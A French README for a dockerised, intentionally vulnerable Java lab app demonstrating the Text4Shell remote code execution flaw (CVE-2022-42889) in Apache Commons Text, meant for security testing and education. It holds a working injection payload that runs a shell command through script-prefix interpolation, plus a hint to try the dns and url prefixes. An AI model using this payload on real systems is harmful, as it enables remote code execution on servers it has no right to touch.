
# Application Java vulnérable dockerisée démontrant l'exécution de code à distance CVE-2022-42889 (Text4Shell) via les recherches de chaînes Apache Commons Text, à des fins de tests de sécurité et d'éducation.
mvn clean install
docker build --tag=text4shell .
docker run -p 80:8080 text4shell
http://localhost/text4shell/attack?search=<n'importe quoi>
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
Vous pouvez également essayer d'utiliser les préfixes dns ou url.
Obtenir l'ID du conteneur
docker container ls
docker exec -it <id_conteneur> bash
foo créé dans le répertoire /tmp) :ls /tmp/
docker container stop <id_conteneur>